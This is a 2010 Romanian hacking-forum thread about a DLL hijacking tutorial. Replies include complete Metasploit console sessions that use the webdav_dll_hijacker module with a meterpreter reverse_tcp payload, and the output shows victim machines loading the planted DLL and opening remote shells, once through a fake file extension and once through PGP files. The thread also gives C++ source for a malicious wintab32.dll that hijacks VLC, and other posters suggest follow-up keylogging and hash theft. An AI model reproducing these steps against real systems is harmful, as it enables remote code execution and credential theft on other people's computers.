1337 Posted September 2, 2010 Report Posted September 2, 2010 #Versiunea Online : DLL Hijacking Tutorial#Download: Multiupload.com - upload your files to multiple file hosting sites!Este o versiune neterminata, mai am de scris o metoda si inca cateva chestii. Daca vreti o completez toata. Sugestiile sunt binevenite Quote
qbert Posted September 2, 2010 Report Posted September 2, 2010 Termin-o,mi-a placut cat am citit. Quote
sado Posted September 2, 2010 Report Posted September 2, 2010 http://rstcenter.com/forum/25509-enciclopedie-ca-tot-ati-vrut.rst Poti trimite acolo . Quote
cla1992 Posted September 2, 2010 Report Posted September 2, 2010 Frumos. Imi palce ideea, o mica sugestie din partea mea: poti adauga si unele optiuni interesante dupa ce s-a pornit o sesiune "meterpreter". Ceva de genu: keylogger, sau pur si simplu niste HASH-uri, s.a.m. (Asta ca un surplus pentru cei necunoscatori, daca tot ai inceput sa explici de la zero)Spor la tutorial, si speram sa fie ceva bun pana in final. Quote
1337 Posted September 2, 2010 Author Report Posted September 2, 2010 Ok , maine o termin si o detaliez functiile din meterpreter si cealalta metoda! Quote
qbert Posted September 3, 2010 Report Posted September 3, 2010 ah,si nu ar trebui: "set payload windows/meterpreter/reverse_tcp" in loc de "payload windows/meterpreter/reverse_tcp"?La 4.Exploatare punctul 4. Quote
neox Posted September 8, 2010 Report Posted September 8, 2010 eu cred ca te referi la asa ceva te uiti la video tse.rarsau asa Filetype endumpmsf exploit(webdav_dll_hijacker) > set EXTENSIONS endumpEXTENSIONS => endumpmsf exploit(webdav_dll_hijacker) > show optionsModule options: Name Current Setting Required Description ---- --------------- -------- ----------- BASENAME policy yes The base name for the listed files. EXTENSIONS endump yes The list of extensions to generate SHARENAME documents yes The name of the top-level share. SRVHOST 192.168.2.37 yes The local host to listen on. SRVPORT 80 yes The daemon port to listen on (do not change) URIPATH / yes The URI to use (do not change).Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique: seh, thread, process LHOST 192.168.2.37 yes The listen address LPORT 4444 yes The listen portExploit target: Id Name -- ---- 0 Automaticmsf exploit(webdav_dll_hijacker) > exploit[*] Exploit running as background job.[*] Started reverse handler on 192.168.2.37:4444[*][*] Exploit links are now available at \\192.168.2.37\documents\[*][*] Using URL: http://192.168.2.37/[*] Server started.msf exploit(webdav_dll_hijacker) >[*] 192.168.2.45:49310 PROPFIND /documents[*] 192.168.2.45:49310 PROPFIND => 301 (/documents)[*] 192.168.2.45:49310 PROPFIND /documents/[*] 192.168.2.45:49310 PROPFIND => 207 Directory (/documents/)[*] 192.168.2.45:49310 PROPFIND /documents[*] 192.168.2.45:49310 PROPFIND => 301 (/documents)[*] 192.168.2.45:49310 PROPFIND /documents/[*] 192.168.2.45:49310 PROPFIND => 207 Directory (/documents/)[*] 192.168.2.45:49310 PROPFIND => 207 Top-Level Directory[*] 192.168.2.45:49310 PROPFIND /DOCUMENTS[*] 192.168.2.45:49310 PROPFIND => 301 (/DOCUMENTS)[*] 192.168.2.45:49310 PROPFIND /DOCUMENTS/[*] 192.168.2.45:49310 PROPFIND => 207 Directory (/DOCUMENTS/)[*] 192.168.2.45:49310 PROPFIND => 207 Top-Level Directory[*] 192.168.2.45:49310 PROPFIND /documents/rsaenh.dll[*] 192.168.2.45:49310 PROPFIND => 207 File (/documents/rsaenh.dll)[*] 192.168.2.45:49310 PROPFIND /DOCUMENTS[*] 192.168.2.45:49310 PROPFIND => 301 (/DOCUMENTS)[*] 192.168.2.45:49310 PROPFIND /DOCUMENTS/[*] 192.168.2.45:49310 PROPFIND => 207 Directory (/DOCUMENTS/)[*] 192.168.2.45:49310 PROPFIND => 207 Top-Level Directory[*] 192.168.2.45:49310 GET => DLL Payload[*] 192.168.2.45:49310 PROPFIND /documents/SDDisk.dll[*] 192.168.2.45:49310 PROPFIND => 207 Directory (/DOCUMENTS/)[*] 192.168.2.45:49310 PROPFIND => 207 Top-Level Directory[*] Sending stage (748544 bytes) to 192.168.2.37[*] Meterpreter session 14 opened (192.168.2.37:4444 -> 192.168.2.45:49315) msf exploit(webdav_dll_hijacker) > sessions -i 14[*] Starting interaction with 14...meterpreter > getuidServer username: root-Vista\neox-----------------------------------------------------------------------------------------PGP - Insecure Library Loading Allows Remote Code Execution (DLL Hijacking)msf exploit(webdav_dll_hijacker) > set EXTENSIONS pgpEXTENSIONS => pgpmsf exploit(webdav_dll_hijacker) > show optionsModule options: Name Current Setting Required Description ---- --------------- -------- ----------- BASENAME policy yes The base name for the listed files. EXTENSIONS pgp yes The list of extensions to generate SHARENAME documents yes The name of the top-level share. SRVHOST 192.168.2.37 yes The local host to listen on. SRVPORT 80 yes The daemon port to listen on (do not change) URIPATH / yes The URI to use (do not change).Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique: seh, thread, process LHOST 192.168.2.37 yes The listen address LPORT 4444 yes The listen portExploit target: Id Name -- ---- 0 Automaticmsf exploit(webdav_dll_hijacker) > exploit[*] Exploit running as background job.[*] Started reverse handler on 192.168.2.37:4444[*][*] Exploit links are now available at \\192.168.2.37\documents\[*][*] Using URL: http://192.168.2.37/[*] Server started.<snip>[*] 192.168.2.45:49183 PROPFIND /documents/[*] 192.168.2.45:49183 PROPFIND => 207 Directory (/documents/)[*] 192.168.2.45:49183 PROPFIND => 207 Top-Level Directory[*] 192.168.2.45:49183 PROPFIND /documents/policy.pgp[*] 192.168.2.45:49183 PROPFIND => 207 File (/documents/policy.pgp)[*] 192.168.2.45:49183 PROPFIND /documents/credssp.dll[*] 192.168.2.45:49183 PROPFIND => 207 File (/documents/credssp.dll)[*] 192.168.2.45:49183 PROPFIND /[*] 192.168.2.45:49183 PROPFIND => 207 Directory (/)[*] 192.168.2.45:49183 PROPFIND => 207 Top-Level Directory[*] 192.168.2.45:49183 GET => DLL Payload[*] 192.168.2.45:49183 PROPFIND /DOCUMENTS[*] 192.168.2.45:49183 PROPFIND => 301 (/DOCUMENTS)[*] 192.168.2.45:49183 PROPFIND /DOCUMENTS/[*] 192.168.2.45:49183 PROPFIND => 207 Directory (/DOCUMENTS/)[*] 192.168.2.45:49183 PROPFIND => 207 Top-Level Directory[*] 192.168.2.45:49183 PROPFIND /documents/rundll32.exe[*] 192.168.2.45:49183 PROPFIND => 404 (/documents/rundll32.exe)[*] Sending stage (748544 bytes) to 10.8.28.55[*] Meterpreter session 1 opened (192.168.2.37:4444 -> 192.168.2.45:49189) at Sun Aug 29 20:40:27 +0200 2010msf exploit(webdav_dll_hijacker) > sessions -i 1[*] Starting interaction with 1...meterpreter > getuidServer username: neox-Vista\neoxsi mai sint doua modalitati una ii de exemplu vclplayer cum descrie pe exploitdb codat in ollydbgPlace a .mp3 file and wintab32.dll in same folder and execute .mp3 file invlc player.Code for wintab32.dll:/*----------*//* wintab32.cpp */#include "stdafx.h"#include "dragon.h"void init() {MessageBox(NULL,"Pwned", "Pwned!",0x00000003);}BOOL APIENTRY DllMain( HANDLE hModule, DWORD ul_reason_for_call, LPVOID lpReserved ){ switch (ul_reason_for_call){case DLL_PROCESS_ATTACH: init();break;case DLL_THREAD_ATTACH:case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH:break; } return TRUE;}/*----------*/la asta fac eu un video cint am timp si a treia modalitate lucrez deocamdata la ia .... Quote
